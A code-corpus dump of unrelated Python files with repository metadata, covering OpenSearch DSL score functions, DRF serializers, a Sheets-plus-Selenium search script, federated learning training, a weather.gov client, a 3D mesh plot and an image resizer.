time.sleep(1)
############ All alerts end ################
else:
print(f"Info: Going to sleep for {int(all_args['interval'])/60} minutes till next try.")
time.sleep(int(all_args['interval']))
counter += 1
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print('\nUser Aborted\nExiting, please wait...')
sys.exit()
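# Example invocation (flags as defined in args_parser above; values illustrative):
#   python vaccinator.py -p 110001 110002 -a 25 -i 300 --run 1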
| 44.612813 | 682 | 0.56225 | 1,924 | 16,016 | 4.537942 | 0.220894 | 0.021762 | 0.027259 | 0.020616 | 0.265949 | 0.241439 | 0.185889 | 0.169396 | 0.134692 | 0.134692 | 0 | 0.017021 | 0.277348 | 16,016 | 358 | 683 | 44.73743 | 0.737342 | 0.024288 | 0 | 0.214765 | 0 | 0.043624 | 0.41748 | 0.021053 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043624 | false | 0.030201 | 0.036913 | 0 | 0.161074 | 0.040268 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b8db7b0a0b74ffa065a705147027e75e8d0ea2e | 3,857 | py | Python | opensearch_dsl/function.py | CEHENKLE/opensearch-dsl-py | f004b394f8c81be59a30b4d6841ab69ccbf9c006 | [
"Apache-2.0"
] | 13 | 2021-10-16T13:11:57.000Z | 2022-02-11T19:13:05.000Z | opensearch_dsl/function.py | CEHENKLE/opensearch-dsl-py | f004b394f8c81be59a30b4d6841ab69ccbf9c006 | [
"Apache-2.0"
] | 9 | 2021-10-15T18:40:15.000Z | 2022-03-23T21:56:29.000Z | opensearch_dsl/function.py | CEHENKLE/opensearch-dsl-py | f004b394f8c81be59a30b4d6841ab69ccbf9c006 | [
"Apache-2.0"
] | 8 | 2021-10-30T13:21:29.000Z | 2022-03-29T20:14:40.000Z | # SPDX-License-Identifier: Apache-2.0
#
# The OpenSearch Contributors require contributions made to
# this file be licensed under the Apache-2.0 license or a
# compatible open source license.
#
# Modifications Copyright OpenSearch Contributors. See
# GitHub history for details.
#
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
try:
import collections.abc as collections_abc # only works on python 3.3+
except ImportError:
import collections as collections_abc
from .utils import DslBase
def SF(name_or_sf, **params):
# {"script_score": {"script": "_score"}, "filter": {}}
if isinstance(name_or_sf, collections_abc.Mapping):
if params:
raise ValueError("SF() cannot accept parameters when passing in a dict.")
kwargs = {}
sf = name_or_sf.copy()
for k in ScoreFunction._param_defs:
if k in name_or_sf:
kwargs[k] = sf.pop(k)
# not sf, so just filter+weight, which used to be boost factor
if not sf:
name = "boost_factor"
# {'FUNCTION': {...}}
elif len(sf) == 1:
name, params = sf.popitem()
else:
raise ValueError("SF() got an unexpected fields in the dictionary: %r" % sf)
# boost factor special case, see https://github.com/elastic/elasticsearch/issues/6343
if not isinstance(params, collections_abc.Mapping):
params = {"value": params}
# mix known params (from _param_defs) and from inside the function
kwargs.update(params)
return ScoreFunction.get_dsl_class(name)(**kwargs)
# ScriptScore(script="_score", filter=Q())
if isinstance(name_or_sf, ScoreFunction):
if params:
raise ValueError(
"SF() cannot accept parameters when passing in a ScoreFunction object."
)
return name_or_sf
# "script_score", script="_score", filter=Q()
return ScoreFunction.get_dsl_class(name_or_sf)(**params)
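# Added usage sketch: the accepted forms above are interchangeable, e.g.
#   SF("script_score", script="_score")
# and
#   SF({"script_score": {"script": "_score"}})
# both resolve to a ScriptScore instance via get_dsl_class("script_score").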
class ScoreFunction(DslBase):
_type_name = "score_function"
_type_shortcut = staticmethod(SF)
_param_defs = {
"query": {"type": "query"},
"filter": {"type": "query"},
"weight": {},
}
name = None
def to_dict(self):
d = super(ScoreFunction, self).to_dict()
# filter and query dicts should be at the same level as us
for k in self._param_defs:
if k in d[self.name]:
d[k] = d[self.name].pop(k)
return d
class ScriptScore(ScoreFunction):
name = "script_score"
class BoostFactor(ScoreFunction):
name = "boost_factor"
def to_dict(self):
d = super(BoostFactor, self).to_dict()
if "value" in d[self.name]:
d[self.name] = d[self.name].pop("value")
else:
del d[self.name]
return d
class RandomScore(ScoreFunction):
name = "random_score"
class FieldValueFactor(ScoreFunction):
name = "field_value_factor"
class Linear(ScoreFunction):
name = "linear"
class Gauss(ScoreFunction):
name = "gauss"
class Exp(ScoreFunction):
name = "exp"
| 30.132813 | 93 | 0.651802 | 499 | 3,857 | 4.937876 | 0.366733 | 0.017045 | 0.022727 | 0.012175 | 0.158685 | 0.10349 | 0.049513 | 0.049513 | 0.049513 | 0.049513 | 0 | 0.005183 | 0.249676 | 3,857 | 127 | 94 | 30.370079 | 0.846234 | 0.380607 | 0 | 0.149254 | 0 | 0 | 0.134664 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044776 | false | 0.029851 | 0.059701 | 0 | 0.462687 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b8e5f0147dcdda64ded2911f084d79a4acf77e0 | 3,438 | py | Python | apps/purchases/api/serializers.py | mikespux/prov-jewellery-cloud | 4bb16b74d4f32eec938e64325c39bb5770ad2848 | [
"MIT"
] | 1 | 2020-05-17T22:27:02.000Z | 2020-05-17T22:27:02.000Z | apps/purchases/api/serializers.py | antorenge/prov-jewellery-cloud | de09048c7043d970d62d13dba1beac73c42ef281 | [
"MIT"
] | 7 | 2020-06-05T18:13:25.000Z | 2022-03-11T23:20:21.000Z | apps/purchases/api/serializers.py | mikespux/prov-jewellery-cloud | 4bb16b74d4f32eec938e64325c39bb5770ad2848 | [
"MIT"
] | null | null | null | """
Purchases API
"""
from rest_framework import serializers
from apps.users.api.serializers import UserSerializer
from apps.inventory.api.serializers import InventoryItemSerializer
from apps.products.api.serializers import (MaterialSerializer,
ProductDesignSerializer)
from ..models import (ArtisanProduction, Supplier, Location, PurchaseOrder,
PurchaseOrderProduct, PurchaseOrderDelivery,
Workshop)
class WorkshopSerializer(serializers.ModelSerializer):
"""Serializer for workshops"""
artisans = UserSerializer(many=True, read_only=True)
class Meta:
model = Workshop
fields = ('name', 'address', 'artisans')
class MiniPurchaseOrderSerializer(serializers.ModelSerializer):
"""Mini serializer for purchase orders"""
workshop = WorkshopSerializer()
class Meta:
model = PurchaseOrder
fields = ('code', 'name', 'workshop', 'date_created', 'due_date')
class PurchaseOrderProductSerializer(serializers.ModelSerializer):
"""Serializer for purchase order products"""
order = MiniPurchaseOrderSerializer()
product = ProductDesignSerializer()
class Meta:
model = PurchaseOrderProduct
fields = ('order', 'product', 'quantity_ordered', 'unit_price')
class PurchaseOrderDeliverySerializer(serializers.ModelSerializer):
"""Serializer for deliveries"""
po_product = PurchaseOrderProductSerializer()
delivered_by = UserSerializer()
received_by = UserSerializer()
items = InventoryItemSerializer(many=True)
class Meta:
model = PurchaseOrderDelivery
fields = ('id', 'po_product', 'items', 'quantity_delivered',
'quantity_received', 'date_delivered', 'date_received',
'delivered_by', 'received_by')
class PurchaseOrderSerializer(serializers.ModelSerializer):
"""Serializer for purchase orders"""
workshop = WorkshopSerializer()
products = PurchaseOrderProductSerializer(
source='purchaseorderproduct_set', many=True)
class Meta:
model = PurchaseOrder
fields = ('code', 'name', 'workshop', 'products', 'date_created',
'due_date')
class LocationSerializer(serializers.ModelSerializer):
"""Serializer for locations"""
class Meta:
model = Location
fields = ('name', 'longitude', 'latitude')
class SupplierSerializer(serializers.ModelSerializer):
"""Serializer for suppliers"""
material = MaterialSerializer()
location = LocationSerializer()
class Meta:
model = Supplier
fields = ('material', 'name', 'address', 'location')
class ArtisanProductionSerializer(serializers.ModelSerializer):
"""Serializer for artisan productions"""
po_product = PurchaseOrderProductSerializer()
suppliers = SupplierSerializer(source='supplier_set', many=True)
location = LocationSerializer()
created_by = UserSerializer()
modified_by = UserSerializer()
class Meta:
model = ArtisanProduction
fields = ('po_product', 'quantity_produced', 'date_created',
'date_modified', 'created_by', 'modified_by', 'location',
'suppliers')
class ValidateSerializer(serializers.Serializer):
"""Validate JSON web tokens serializer"""
id = serializers.CharField(max_length=200)
signed = serializers.CharField()
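# Illustrative use (standard DRF pattern; `order` is an assumed PurchaseOrder instance):
#   payload = PurchaseOrderSerializer(order).data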
| 30.696429 | 75 | 0.684991 | 277 | 3,438 | 8.393502 | 0.314079 | 0.089462 | 0.048172 | 0.117419 | 0.151828 | 0.087742 | 0.042151 | 0.042151 | 0 | 0 | 0 | 0.001109 | 0.213205 | 3,438 | 111 | 76 | 30.972973 | 0.85841 | 0.084642 | 0 | 0.242424 | 0 | 0 | 0.133484 | 0.007757 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.075758 | 0 | 0.621212 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b914dd6bd0c32e0b0e0f9fee38aac8091c15b3b | 3,063 | py | Python | src/fill_in_forms.py | vicksonzero/webbot | 8cdbe655bafae90d390c0f051c799e164d63365e | [
"MIT"
] | null | null | null | src/fill_in_forms.py | vicksonzero/webbot | 8cdbe655bafae90d390c0f051c799e164d63365e | [
"MIT"
] | null | null | null | src/fill_in_forms.py | vicksonzero/webbot | 8cdbe655bafae90d390c0f051c799e164d63365e | [
"MIT"
] | null | null | null | # Google sheets
from __future__ import print_function
import httplib2
import os
from apiclient import discovery
import oauth2client
from oauth2client import client
from oauth2client import tools
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
# selenium
import time
from selenium import webdriver
import requests
# Dickson
# import os
from keys import google_sheet_presets, selenium_presets
import random
SCOPES = 'https://www.googleapis.com/auth/spreadsheets.readonly'
CLIENT_SECRET_FILE = "keys/client_secret_oauth.json"
APPLICATION_NAME = 'Google Sheets API Python Quickstart'
def get_credentials():
"""
Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(
credential_dir,
'google-sheet-fill-in-forms-py.json')
store = oauth2client.file.Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
print('Storing credentials to ' + credential_path)
return credentials
def getSpreadsheetValues(spreadsheetId, rangeName):
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
discoveryUrl = 'https://sheets.googleapis.com/$discovery/rest?version=v4'
service = discovery.build(
'sheets',
'v4',
http = http,
discoveryServiceUrl = discoveryUrl)
# COLUMNS
result = (service.spreadsheets().values().get(
spreadsheetId = spreadsheetId,
range = rangeName,
majorDimension = "COLUMNS"
)
.execute())
result.get('values', [])
return result
def main():
"""
reads names from google sheet,
uses selenium to open a chrome google.com
input 5 random names from the sheet and search
"""
values = getSpreadsheetValues(google_sheet_presets.SHEET_ID, "C4:C29")
print("sheet result:")
print(values)
chromedriver = selenium_presets.CHROME_DRIVER
#os.environ["webdriver.chrome.driver"] = chromedriver
driver = webdriver.Chrome(chromedriver)
for i in range(5):
randomName = random.choice(values["values"][0])
print(randomName)
driver.get('http://www.google.com/xhtml')
time.sleep(1) # Let the user actually see something!
search_box = driver.find_element_by_id('gs_lc0')
search_box = search_box.find_element_by_css_selector(".gsfi")
search_box.send_keys("sc2 " + randomName)
search_box.submit()
time.sleep(3) # Let the user actually see something!
time.sleep(3)
driver.quit()
if __name__ == '__main__':
main()
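# Note (assumptions spelled out): this script expects a chromedriver path in
# keys/selenium_presets, a Google Sheet id in keys/google_sheet_presets, and an
# OAuth client secret at keys/client_secret_oauth.json, per the constants above.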
| 27.106195 | 75 | 0.757754 | 395 | 3,063 | 5.726582 | 0.412658 | 0.019894 | 0.01061 | 0.020336 | 0.026525 | 0.026525 | 0 | 0 | 0 | 0 | 0 | 0.00834 | 0.138753 | 3,063 | 112 | 76 | 27.348214 | 0.849128 | 0.186092 | 0 | 0.026316 | 0 | 0 | 0.137414 | 0.025537 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039474 | false | 0 | 0.184211 | 0 | 0.25 | 0.065789 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b95d709623e6f9a1a48dbe716470993b1042f83 | 323 | py | Python | pythx/__init__.py | s0b0lev/pythx | c34d81421a2cbea71e60c33245d54fb19b6ad68a | [
"MIT"
] | null | null | null | pythx/__init__.py | s0b0lev/pythx | c34d81421a2cbea71e60c33245d54fb19b6ad68a | [
"MIT"
] | null | null | null | pythx/__init__.py | s0b0lev/pythx | c34d81421a2cbea71e60c33245d54fb19b6ad68a | [
"MIT"
] | null | null | null | """Top-level package for pythx."""
__author__ = """Dominik Muhs"""
__email__ = "dominik.muhs@consensys.net"
__version__ = "1.3.2"
from pythx.conf import config
from pythx.api.client import Client
from mythx_models.exceptions import (
MythXBaseException,
MythXAPIError,
ValidationError,
)
| 21.533333 | 40 | 0.736842 | 37 | 323 | 6.081081 | 0.72973 | 0.097778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010949 | 0.151703 | 323 | 14 | 41 | 23.071429 | 0.810219 | 0.086687 | 0 | 0.181818 | 0 | 0 | 0.148789 | 0.089965 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.272727 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b96fe8753e574fd0587ec62d1080f3007e66924 | 6,882 | py | Python | src/main.py | karavik18/Verification-and-Selection-in-Federated-Average | b7a275b6158c9e9d9c16c1e62786558037196306 | [
"MIT"
] | null | null | null | src/main.py | karavik18/Verification-and-Selection-in-Federated-Average | b7a275b6158c9e9d9c16c1e62786558037196306 | [
"MIT"
] | null | null | null | src/main.py | karavik18/Verification-and-Selection-in-Federated-Average | b7a275b6158c9e9d9c16c1e62786558037196306 | [
"MIT"
] | null | null | null | import os
import time
import copy
import random
import argparse
import numpy as np
from PIL import Image
from tqdm import tqdm as tq
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils import data
from model_utils import *
from data_utils import *
from train import train
from inference import calc_acc
from model_selection_utils import model_selection
def avg_weights(w, args):
running_mean_sqr, running_sqr_mean = [], []
wts = torch.ones(len(w)).to(args.device)
w_avg = copy.deepcopy(w[0])
for key in w_avg.keys():
w_avg[key] = w_avg[key].to(args.device)
layer = key.split('.')[-1]
if layer == 'running_mean':
for i in range(len(w)):
running_mean_sqr.append(torch.square(w[i][key].to(args.device)))
if i != 0:
w_avg[key] += torch.mul(w[i][key].to(args.device),wts[i].to(float))
key_prev = key
w_avg[key] = torch.true_divide(w_avg[key].to(args.device), sum(wts))
elif layer == 'running_var':
for i in range(len(w)):
running_sqr_mean.append(torch.mul(torch.add(w[i][key].to(args.device),running_mean_sqr[i]),wts[i].to(float)))
running_sqr_mean_avg = torch.true_divide(sum(running_sqr_mean), sum(wts))
w_avg[key] = torch.sub(running_sqr_mean_avg, torch.square(w_avg[key_prev].to(args.device)))
running_mean_sqr, running_sqr_mean = [], []
elif layer == 'num_batches_tracked':
for i in range(1,len(w)):
w_avg[key] += w[i][key].to(args.device)
w_avg[key] = torch.true_divide(w_avg[key].to(args.device), len(w)).to(torch.int64)
else:
for i in range(1,len(w)):
w_avg[key] += torch.mul(w[i][key].to(args.device), wts[i].to(float))
w_avg[key] = torch.true_divide(w_avg[key].to(args.device), sum(wts))
return w_avg
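# Added note on the BatchNorm aggregation above: it relies on the identity
#   Var[x] = E[x^2] - (E[x])^2,
# so the averaged running_var is recovered from the weighted mean of the clients'
# (running_var_i + running_mean_i^2) minus the square of the averaged running_mean.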
def server_coordination(args):
Model = get_model(args)
global_model = Model.state_dict()
if args.dataset == 'mnist':
testloader = data.DataLoader(mnistLoader(split='test'), batch_size=args.batch_size, shuffle=False, pin_memory=False)
else:
testloader = None
test_acc = []
for round_ in range(args.round):
print("\nRound {} is started.\n".format(round_+1))
received_models = []
selected_users = np.random.choice(np.arange(args.num_users), size=max(int(args.num_users*args.frac), 1), replace=False)
for user in selected_users:
local_model = train(global_model, user, round_+1, args)
received_models.append(local_model)
selected_models = model_selection(received_models, global_model, args)
global_model = avg_weights(selected_models, args)
Model.load_state_dict(global_model)
test_acc.append(calc_acc(testloader, Model, args))
print("\t Accuracy of the 'Global Model' on test dataset: {:.2f}%".format(test_acc[-1]))
torch.save(global_model, args.modelpath+'model_niid-degree_'+str(args.niid_degree)+'.pt')
torch.save(test_acc, args.resultpath+'test_acc_'+str(args.niid_degree)+'.pt')
# test accuracy plot
plt.figure()
plt.plot(range(1,len(test_acc)+1), test_acc, '-b')
plt.xlabel('Communication rounds')
plt.ylabel('Accuracy')
plt.title('Percentage Accuracy, evaluated on Test set')
plt.xlim(1,len(test_acc))
plt.ylim(0, 100)
plt.savefig(args.resultpath+'test_acc_'+str(args.niid_degree)+'.pdf')
def args_parser():
parser = argparse.ArgumentParser()
# federated arguments (Notation for the arguments followed from paper)
parser.add_argument('--algo', choices=['FedAvg', 'FedProx'], type=str, default='FedAvg', help="Name of algorithm. Allowable values: FedAvg and FedProx")
parser.add_argument('--loc_epoch', '-le', type=int, default=10, help="Number of local epochs: E")
parser.add_argument('--frac', '-c', type=float, default=0.1, help='the fraction of clients: C')
parser.add_argument('--drop_percent', '-dp', type=float, default=0.4, help='percentage of slow devices')
parser.add_argument('--mu', type=float, default=0, help="The proximal loss for the FedProx algo")
parser.add_argument('--batch_size', '-b', type=int, default=10, help="Local batch size: B")
parser.add_argument('--aug', type=int, default=0, help="1 inplies augmentation enabled")
parser.add_argument('--lr', type=float, default=1e-3, help="Learning rate for generator networks")
parser.add_argument('--round', '-r', type=int, default=10, help="number of communication round")
# other arguments
parser.add_argument('--dataset', type=str, default='mnist', help="name of dataset")
parser.add_argument('--model', choices=['MLP', 'CNN'], type=str, default='MLP', help='model name')
parser.add_argument('--hidden_nodes', '-hn', default=100, type=int, help='Number of hidden nodes in MLP')
parser.add_argument('--gpu', default=0, type=int, help='GPU number')
parser.add_argument('--optimizer', type=str, default='sgd', help="type of optimizer")
parser.add_argument('--niid_degree', '-nd', type=int, default=0, help='Default set to IID. Set integers from 1 to 4 for incresing degree of non-IID.')
parser.add_argument('--verbose', type=int, default=1, help='verbose')
parser.add_argument('--seed', type=int, default=1, help='random seed')
parser.add_argument('--run', type=str, default=-999, help="Run number")
args = parser.parse_args()
args.device = torch.device("cuda:"+str(args.gpu) if torch.cuda.is_available() else "cpu")
# directory to save results
args.root = os.path.dirname(os.path.abspath('./.'))
savepath = args.root+'/save/'
args.resultpath = savepath +'results/run_'+str(args.run)+'/'
args.modelpath = savepath+'/models/run_'+str(args.run)+'/'
if args.dataset == 'mnist':
args.num_users = 150
args.num_classes = 10
else:
args.num_users = 0
args.num_classes = 0
if not os.path.isdir(args.resultpath):
os.makedirs(args.resultpath)
if not os.path.isdir(args.modelpath):
os.makedirs(args.modelpath)
# saving args as dict
torch.save(vars(args), args.resultpath+'args_'+str(args.niid_degree)+'.pt')
print("Algo: {} | No. local epochs: {} | No. of communication round: {} | Dataset: {} | Model: {}\nDegree of Non-IID-ness: {} | No. users: {} | Client selection fraction: {}".format(args.algo, args.loc_epoch, args.round, args.dataset, args.model, args.niid_degree, args.num_users, args.frac))
return args
if __name__ == "__main__":
args = args_parser()
server_coordination(args)
time.sleep(20)
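# Example invocation (flags as defined in args_parser above; values illustrative):
#   python main.py --algo FedAvg -le 10 -c 0.1 -r 10 -nd 0 --run 1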
| 44.115385 | 297 | 0.648794 | 987 | 6,882 | 4.372847 | 0.237082 | 0.037535 | 0.070899 | 0.031279 | 0.200185 | 0.145505 | 0.101019 | 0.07785 | 0.060241 | 0.060241 | 0 | 0.010173 | 0.200087 | 6,882 | 155 | 298 | 44.4 | 0.773842 | 0.021651 | 0 | 0.123967 | 0 | 0.008264 | 0.171696 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024793 | false | 0 | 0.14876 | 0 | 0.190083 | 0.024793 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b9bae125e13deb3ca6f4383bdd93263a6ff8361 | 2,398 | py | Python | weather/forecast.py | Shom770/weather_usa | 4e925c4eb7fbbc444a27f2969d342335dae5ea83 | [
"MIT"
] | null | null | null | weather/forecast.py | Shom770/weather_usa | 4e925c4eb7fbbc444a27f2969d342335dae5ea83 | [
"MIT"
] | null | null | null | weather/forecast.py | Shom770/weather_usa | 4e925c4eb7fbbc444a27f2969d342335dae5ea83 | [
"MIT"
] | null | null | null | from __future__ import annotations
import asyncio
import aiohttp
from datetime import datetime
class Forecast:
def __init__(self, totals: dict, grid_x: int, grid_y: int, cwa: str, city: str, state: str):
self.totals = totals
self.simplified_dict = {key: '...' for key in totals.keys()}
self.grid_x, self.grid_y = grid_x, grid_y
self.city, self.state = city, state
self.cwa = cwa
def __repr__(self):
return f"Forecast(totals={self.simplified_dict}, grid_x={self.grid_x}, grid_y={self.grid_y}," \
f" cwa={self.cwa}, city={self.city}, state={self.state})"
def forecast(latitude: float, longitude: float) -> Forecast:
"""Main function for retrieving forecast for a longitude and latitude"""
loop = asyncio.get_event_loop()
*information, request = loop.run_until_complete(_get_gridpoint(latitude, longitude))
res = loop.run_until_complete(_get_forecast(request))
return Forecast(totals=res, grid_x=information[0], grid_y=information[1],
cwa=information[2], city=information[3], state=information[4])
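# Illustrative usage (coordinates are an arbitrary example, not from the original file):
#   fc = forecast(38.8894, -77.0352)
#   print(fc.city, fc.state, list(fc.totals)[:3])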
async def _get_gridpoint(latitude: float, longitude: float) -> tuple[int, int, str, str, str, str]:
async with aiohttp.ClientSession() as session:
async with session.get(f"https://api.weather.gov/points/{latitude},{longitude}") as response:
response = await response.json()
response = response['properties']
return response['gridX'], response['gridY'], response['gridId'], \
response['relativeLocation']['properties']['city'], \
response['relativeLocation']['properties']['state'], \
response['forecastGridData']
async def _get_forecast(url: str) -> dict:
async with aiohttp.ClientSession() as session:
async with session.get(url) as response:
response = await response.json()
response = response['properties']
totals = {}
for key, val in zip(list(response.keys())[8:], list(response.values())[8:]):
if isinstance(val, dict):
totals[key] = {}
for time_dct in val['values']:
time = time_dct['validTime'].split('/')[0]
totals[key][datetime.fromisoformat(time)] = time_dct['value']
return totals | 46.115385 | 103 | 0.621351 | 282 | 2,398 | 5.131206 | 0.308511 | 0.020733 | 0.01244 | 0.033172 | 0.214236 | 0.163096 | 0.163096 | 0.163096 | 0.163096 | 0.078784 | 0 | 0.00442 | 0.245204 | 2,398 | 52 | 104 | 46.115385 | 0.795028 | 0.027523 | 0 | 0.142857 | 0 | 0 | 0.140524 | 0.034809 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.095238 | 0.02381 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b9d5e37aaae1696ad5a8c3f64abcd5dca15ddbc | 1,170 | py | Python | bunny.py | querciak/matplotlib-3d | 8d361b861f33b1133fcf304a2e397769797ef1d3 | [
"BSD-2-Clause"
] | 242 | 2020-03-26T11:36:21.000Z | 2022-03-10T01:57:54.000Z | bunny.py | mikepsn/matplotlib-3d | 538d514e7fd11843f5a338a52b5887c3f16a9bff | [
"BSD-2-Clause"
] | 6 | 2020-03-30T18:20:09.000Z | 2021-01-26T20:16:07.000Z | bunny.py | mikepsn/matplotlib-3d | 538d514e7fd11843f5a338a52b5887c3f16a9bff | [
"BSD-2-Clause"
] | 31 | 2020-03-29T01:55:55.000Z | 2022-03-29T12:52:14.000Z | # -----------------------------------------------------------------------------
# Copyright (c) 2020 Nicolas P. Rougier. All rights reserved.
# Distributed under the (new) BSD License.
# -----------------------------------------------------------------------------
# This example shows how to display a mesh
# -----------------------------------------------------------------------------
import numpy as np
from mpl3d import glm
from mpl3d.mesh import Mesh
from mpl3d.camera import Camera
import meshio
# --- main --------------------------------------------------------------------
if __name__ == "__main__":
import matplotlib.pyplot as plt
fig = plt.figure(figsize=(4,4))
ax = fig.add_axes([0,0,1,1], xlim=[-1,+1], ylim=[-1,+1], aspect=1)
ax.axis("off")
camera = Camera("ortho", scale=2)
mesh = meshio.read("data/bunny.obj")
vertices = mesh.points
faces = mesh.cells[0].data
vertices = glm.fit_unit_cube(vertices)
mesh = Mesh(ax, camera.transform, vertices, faces,
cmap=plt.get_cmap("magma"), edgecolors=(0,0,0,0.25))
camera.connect(ax, mesh.update)
plt.savefig("bunny.png", dpi=600)
plt.show()
| 36.5625 | 79 | 0.486325 | 133 | 1,170 | 4.18797 | 0.593985 | 0.014363 | 0.010772 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029116 | 0.148718 | 1,170 | 31 | 80 | 37.741935 | 0.53012 | 0.387179 | 0 | 0 | 0 | 0 | 0.062059 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.3 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b9d6d92851d5c526612bcafb989ae5b804d21b9 | 1,193 | py | Python | Backend/resize.py | tfederico/WatsonInnovation | 22a7bf28c4a110f2af0d45c77fa7971f3d0f9647 | [
"MIT"
] | null | null | null | Backend/resize.py | tfederico/WatsonInnovation | 22a7bf28c4a110f2af0d45c77fa7971f3d0f9647 | [
"MIT"
] | null | null | null | Backend/resize.py | tfederico/WatsonInnovation | 22a7bf28c4a110f2af0d45c77fa7971f3d0f9647 | [
"MIT"
] | null | null | null | import os, sys
from PIL import Image
import argparse
from os import listdir
from os.path import isfile, join
if __name__ == '__main__':
maxheigth = 320
maxwidth = 320
parser = argparse.ArgumentParser(description='Cleaning files that are too big.')
parser.add_argument('-dir', '--d', help="Directory name", required=True)
args = parser.parse_args()
directory = args.d
directory = "res/images/"+directory
print(directory)
onlyfiles = [f for f in listdir(directory) if isfile(join(directory, f)) and not ".zip" in f]
resizedDir = directory+"/resized"
if not os.path.exists(resizedDir):
os.makedirs(resizedDir)
for f in onlyfiles:
try:
img = Image.open(directory+"/"+f)
width, heigth = img.size
ratio = min(maxwidth/float(width),maxheigth/float(heigth))
if ratio < 1:
size = ratio*width, ratio*heigth
img.thumbnail(size, Image.ANTIALIAS)
img.save(resizedDir+"/"+f)
os.rename(resizedDir+"/"+f, directory+"/"+f)
except IOError:
print("cannot create thumbnail for '%s'" % f)
os.rmdir(resizedDir)
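# Example invocation (directory name illustrative): python resize.py -dir vacation
# resizes every non-zip file under res/images/vacation in place, capped at 320x320.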
